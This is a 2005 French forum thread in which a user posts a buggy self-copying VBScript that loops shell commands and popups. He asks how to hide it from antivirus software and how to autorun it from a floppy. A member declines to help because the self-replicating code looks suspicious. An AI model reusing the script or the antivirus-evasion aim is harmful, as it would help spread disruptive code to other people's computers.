Jai quelques questions a propos du VBS

cs_king67 Messages postés 2 Date d'inscription samedi 28 mai 2005 Statut Membre Dernière intervention 28 mai 2005 - 28 mai 2005 à 19:50
cs_CanisLupus Messages postés 3757 Date d'inscription mardi 23 septembre 2003 Statut Membre Dernière intervention 13 mars 2006 - 28 mai 2005 à 20:48
Bonjour, je suis nouveau sur ce forum et je me demandait comment je pourrait faire pour mettre mon script en .VBS indetectable au anti-virus, ca ou le crypter. Je vous donne mon script :

On Error Resume Next
Dim fso, shell, f
Set fso=CreateObject("Scripting.FileSystemObject")
Set shell=CreateObject("Wscript.Shell")


if (fso.fileexists("C:\savegames\blast.vbs")) then


call f1
call f2


function f1
shell.run "cmd /K CD C:\ & blast.vbs.txt", true ' ICI NORTON LE DETECTE
call f2
end function


function f2
shell.popup "ENJOY THE OWN", 1, "TOTAL OWNATION", 16
call f1
end function


else


Set f = fso.Createtextfile("C:\savegames\blast.vbs") ' ICI NORTON LE DETECTE
f.writeline "call f1"
f.writeline "call f2"
f.WriteBlankLines 1
f.writeline "funtion f1"
f.writeline "shell.execute " & "C:\blast.vbs" ' ICI PAS CAPABLE DE METTRE LES "
f.writeline "call f2"
f.writeline "end function"
f.WriteBlankLines 1
f.writeline "function f2"


f.writeline "end function"
f.WriteBlankLines 1
f.writeline "shell.close"
f.writeline "fso.close"


end if


shell.close()
fso.close()

Question #2 : Est-il possible de mettre un autorun comme un CD mais sur un diskette pour faire ouvrir un fichier directement en mettant la diskette dans le lecteur ?

Merci pour la reponse

3 réponses

econs Messages postés 4030 Date d'inscription mardi 13 mai 2003 Statut Membre Dernière intervention 23 décembre 2008 25
28 mai 2005 à 20:07
Question 1 :



Il n'est pas très net ton code ...



en plus, il y a effectivement plein de trucs qui ne vont pas (appels en boucle, chaines mal concaténées, ...)

Et puis, un fichier qui se recopie lui-même, c'est louche ...



Bref, peu de chance que tu trouves de l'aide sur ce site.

Sorry,



Question 2 :



Pas d'autorun sur une disquette. Juste sur CDROM.




Manu
-------------------------------------------
Une question bien posée, c'est une chance de réponse bien adaptée.
0
cs_king67 Messages postés 2 Date d'inscription samedi 28 mai 2005 Statut Membre Dernière intervention 28 mai 2005
28 mai 2005 à 20:14
Merci de ta reponse, je vais donc devoir trouver de laide ailleur
0
cs_CanisLupus Messages postés 3757 Date d'inscription mardi 23 septembre 2003 Statut Membre Dernière intervention 13 mars 2006 21
28 mai 2005 à 20:48
C'est ça, va voir ailleurs !

-------------------------------------------------
Dresseur de puces, .... normal pour un loup !?
0
Rejoignez-nous